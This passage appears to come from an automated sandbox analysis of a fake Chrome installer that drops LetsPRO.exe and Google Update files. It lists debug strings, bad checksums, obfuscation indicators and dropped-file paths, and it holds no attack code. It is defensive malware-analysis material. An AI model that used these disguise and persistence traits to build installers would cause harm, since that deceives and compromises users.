Source: Binary string: TEST_goopdateres_unsigned_cs.pdb source: GoogleUpdate.exe, 0000001E.00000003.2110976317.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2110976317.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111107544.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_cs.dll.16.dr
Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*u source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*sC source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_da.pdb source: GoogleUpdate.exe, 0000001E.00000003.2111298114.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111298114.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2111407957.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_iw.pdb source: GoogleUpdate.exe, 0000001E.00000003.2127191270.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2127191270.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2127845823.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_ja.pdb source: GoogleUpdate.exe, 0000001E.00000003.2129974854.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2129974854.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2130517355.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_psuser_unsigned_64.pdbF source: GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psuser_64.dll.30.dr, psuser_64.dll.16.dr
Source: Binary string: TEST_goopdateres_unsigned_et.pdb source: GoogleUpdate.exe, 0000001E.00000003.2115013262.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2114814698.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_et.dll.30.dr
Source: Binary string: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338389\LetsPRO.execation Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE source: LetsPRO.exe, 00000004.00000003.2231954101.0000000000624000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{d4876bf7-244b-4c34-87a7-98ddf5c5224d}\*.*ecation Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE source: LetsPRO.exe, 00000004.00000003.2233011919.0000000000628000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\LetsPRO.exern source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GoogleUpdateComRegisterShell64_unsigned.pdbR source: GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2107741736.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ons\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B784 source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GoogleUpdateComRegisterShell64_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2106070949.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2107741736.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb source: sutup-Chrome.13.26.x64.msi, MSIB54D.tmp.1.dr
Source: Binary string: TEST_goopdateres_unsigned_hr.pdb source: GoogleUpdate.exe, 0000001E.00000003.2118451077.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2118651881.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2118451077.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_hr.dll.16.dr
Source: Binary string: TEST_psuser_unsigned_64.pdb source: GoogleUpdate.exe, 0000001E.00000003.2148667940.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psuser_64.dll.30.dr, psuser_64.dll.16.dr
Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4 source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_hi.pdb source: GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2118068933.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\LetsPRO.exeU source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GoogleUpdateOnDemand_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2170069383.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169861546.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateOnDemand.exe.30.dr, GoogleUpdateOnDemand.exe.16.dr
Source: Binary string: 785491~1.LOCntkrnlmp.pdb5x source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdate_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000002.3271726771.000000006CE05000.00000002.00000001.01000000.00000009.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104207516.00000000057C1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5r source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\aischeduler2.pdb source: sutup-Chrome.13.26.x64.msi, 5bb04c.rbs.1.dr
Source: Binary string: TEST_goopdateres_unsigned_ms.pdb source: goopdateres_ms.dll.30.dr
Source: Binary string: TEST_goopdateres_unsigned_fr.pdb source: GoogleUpdate.exe, 0000001E.00000003.2116622503.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116824716.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116622503.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_fr.dll.30.dr
Source: Binary string: msvcr100.i386.pdb source: LetsPRO.exe, LetsPRO.exe, 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000000D.00000002.2181610240.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000000E.00000002.2186367127.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000000F.00000002.2173589064.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 00000011.00000002.2191724074.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 00000012.00000002.2192475621.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 00000013.00000002.2192454597.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001A.00000002.2192585742.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001B.00000002.2192407874.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001C.00000002.2191917426.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001D.00000002.2181725589.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001F.00000002.2209318696.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: GoogleCrashHandler64_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler64.exe.30.dr
Source: Binary string: TEST_goopdateres_unsigned_zh-CN.pdb source: GoogleUpdate.exe, 0000001E.00000002.3269312732.0000000000E60000.00000002.00000001.00040000.0000000D.sdmp
Source: Binary string: TEST_goopdateres_unsigned_kn.pdb source: GoogleUpdate.exe, 0000001E.00000003.2131480037.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131480037.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdbE source: sutup-Chrome.13.26.x64.msi, MSIB54D.tmp.1.dr
Source: Binary string: TEST_goopdateres_unsigned_ml.pdb source: goopdateres_ml.dll.16.dr
Source: Binary string: on Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.* source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_fil.pdb source: GoogleUpdate.exe, 0000001E.00000003.2116341966.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116214832.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116214832.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_ur.pdb source: goopdateres_ur.dll.30.dr
Source: Binary string: load_prod.pdb\*.*5n source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_sv.pdb source: goopdateres_sv.dll.16.dr
Source: Binary string: TEST_goopdateres_unsigned_fi.pdb source: GoogleUpdate.exe, 0000001E.00000003.2115798328.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115924326.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115798328.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_fi.dll.16.dr
Source: Binary string: GoogleUpdateCore_unsigned.pdbV source: ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104991502.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105067095.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104969687.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateCore.exe.30.dr, GoogleUpdateCore.exe.16.dr
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: LetsPRO.exe, 00000004.00000003.2233090425.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_nl.pdb source: goopdateres_nl.dll.16.dr
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\LetsPRO.exe source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_ro.pdb source: goopdateres_ro.dll.16.dr
Source: Binary string: TEST_goopdateres_unsigned_sw.pdb source: goopdateres_sw.dll.16.dr, goopdateres_sw.dll.30.dr
Source: Binary string: GoogleCrashHandler64_unsigned.pdbl source: GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler64.exe.30.dr
Source: Binary string: TEST_goopdateres_unsigned_hu.pdb source: GoogleUpdate.exe, 0000001E.00000003.2119453694.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119237842.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119237842.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_hu.dll.30.dr
Source: Binary string: TEST_goopdateres_unsigned_ta.pdb source: goopdateres_ta.dll.16.dr
Source: Binary string: TEST_psmachine_unsigned.pdbJ source: GoogleUpdate.exe, 0000001E.00000003.2149107681.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psmachine.dll.16.dr
Source: Binary string: pplication Data\Temp\Symbols\ntkrnlmp.pdb\*.*so source: LetsPRO.exe, 00000004.00000003.2287547893.0000000000614000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbl: source: LetsPRO.exe, 00000004.00000003.2233090425.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_it.pdb source: GoogleUpdate.exe, 0000001E.00000003.2125024951.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2125024951.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_it.dll.16.dr
Source: Binary string: TEST_goopdateres_unsigned_en-GB.pdb source: GoogleUpdate.exe, 0000001E.00000003.2112956106.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112849387.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112849387.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_en-GB.dll.30.dr
Source: Binary string: TEST_goopdateres_unsigned_sk.pdb source: goopdateres_sk.dll.16.dr, goopdateres_sk.dll.30.dr
Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*a+ source: LetsPRO.exe, 00000004.00000002.3261617800.0000000000614000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_te.pdb source: goopdateres_te.dll.16.dr
Source: Binary string: TEST_goopdateres_unsigned_id.pdb source: GoogleUpdate.exe, 0000001E.00000003.2120248685.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\LetsPRO.exe source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\LetsPRO.exe4 source: LetsPRO.exe, 00000004.00000003.2233041537.0000000000614000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*.*F source: LetsPRO.exe, 00000004.00000003.2233011919.0000000000628000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LetsPRO.exe, 00000004.00000003.2233090425.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_vi.pdb source: goopdateres_vi.dll.30.dr
Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\LetsPRO.exenage source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: TEST_goopdateres_unsigned_es.pdb source: GoogleUpdate.exe, 0000001E.00000003.2113768779.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113540436.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113540436.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_es.dll.30.dr, goopdateres_es.dll.16.dr
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F37490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary, 4_2_03F37490
PE file contains an invalid checksum
Source: GoogleUpdateSetup.exe.16.dr Static PE information: real checksum: 0x154762 should be: 0x15c4ea
Source: LetsPRO.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x6020
Source: LetsPRO.exe.1.dr Static PE information: real checksum: 0x0 should be: 0x6020
Source: ChromeSetup.exe.1.dr Static PE information: real checksum: 0x154762 should be: 0x15c4ea
PE file contains sections with non-standard names
Source: beacon_sdk.dll.1.dr Static PE information: section name: .QMGuid
Source: common.dll.1.dr Static PE information: section name: .QMGuid
Source: Lua51.dll.1.dr Static PE information: section name: .00cfg
Source: MSIB404.tmp.1.dr Static PE information: section name: .didat
Source: MSIB5FB.tmp.1.dr Static PE information: section name: .didat
Source: GoogleUpdateComRegisterShell64.exe.16.dr Static PE information: section name: _RDATA
Source: GoogleUpdateComRegisterShell64.exe.16.dr Static PE information: section name: .gxfg
Source: GoogleUpdateComRegisterShell64.exe.16.dr Static PE information: section name: .gehcont
Source: psmachine.dll.16.dr Static PE information: section name: .orpc
Source: psmachine_64.dll.16.dr Static PE information: section name: .orpc
Source: psmachine_64.dll.16.dr Static PE information: section name: _RDATA
Source: psmachine_64.dll.16.dr Static PE information: section name: .gxfg
Source: psmachine_64.dll.16.dr Static PE information: section name: .gehcont
Source: psuser.dll.16.dr Static PE information: section name: .orpc
Source: psuser_64.dll.16.dr Static PE information: section name: .orpc
Source: psuser_64.dll.16.dr Static PE information: section name: _RDATA
Source: psuser_64.dll.16.dr Static PE information: section name: .gxfg
Source: psuser_64.dll.16.dr Static PE information: section name: .gehcont
Source: GoogleCrashHandler64.exe.16.dr Static PE information: section name: _RDATA
Source: GoogleCrashHandler64.exe.16.dr Static PE information: section name: .gxfg
Source: GoogleCrashHandler64.exe.16.dr Static PE information: section name: .gehcont
Source: psuser.dll.30.dr Static PE information: section name: .orpc
Source: psuser_64.dll.30.dr Static PE information: section name: .orpc
Source: psuser_64.dll.30.dr Static PE information: section name: _RDATA
Source: psuser_64.dll.30.dr Static PE information: section name: .gxfg
Source: psuser_64.dll.30.dr Static PE information: section name: .gehcont
Source: psmachine.dll.30.dr Static PE information: section name: .orpc
Source: psmachine_64.dll.30.dr Static PE information: section name: .orpc
Source: psmachine_64.dll.30.dr Static PE information: section name: _RDATA
Source: psmachine_64.dll.30.dr Static PE information: section name: .gxfg
Source: psmachine_64.dll.30.dr Static PE information: section name: .gehcont
Uses code obfuscation techniques (call, push, ret)
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_025F9E65 push ecx; ret 4_2_025F9E78
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F44345 push ecx; ret 4_2_03F44358
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F5A168 push eax; ret 4_2_03F5A119
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F5A0B8 push eax; ret 4_2_03F5A119
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C8F2D80 push eax; ret 5_2_6C8F2D9E
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C9009C5 push ecx; ret 5_2_6C9009D8
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C91A6CA push EF3FEFD4h; iretd 5_2_6C91A6D1
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C919CF8 pushad ; iretd 5_2_6C919D06
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C90BFB0 push ecx; ret 5_2_6C90BFC3
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_00258835 push ecx; ret 8_2_00258848
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_00258C76 push ecx; ret 8_2_00258C89
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_000159A6 push ecx; ret 16_2_000159B9
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_00026CF3 push ecx; ret 16_2_00026D06
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_00134543 push ecx; ret 30_2_00134556
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_00127A56 push ecx; ret 30_2_00127A69
Source: msvcr100.dll.1.dr Static PE information: section name: .text entropy: 6.910468675356735

Persistence and Installation Behavior
barindex
Creates files in the system32 config directory
Source: C:\Windows\System32\netsh.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepub
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Program Files (x86)\ChromeSetup.exe Executable created and started: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Jump to behavior
Drops PE files
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_it.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sw.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler64.exe Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ca.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_nl.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hu.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ta.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ro.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_am.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sv.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ml.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine_64.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ur.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-CN.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_vi.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_is.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pt-PT.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fr.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_da.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_iw.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_kn.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_et.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_no.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_te.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sk.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\psmachine_64.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_en.dll Jump to dropped file
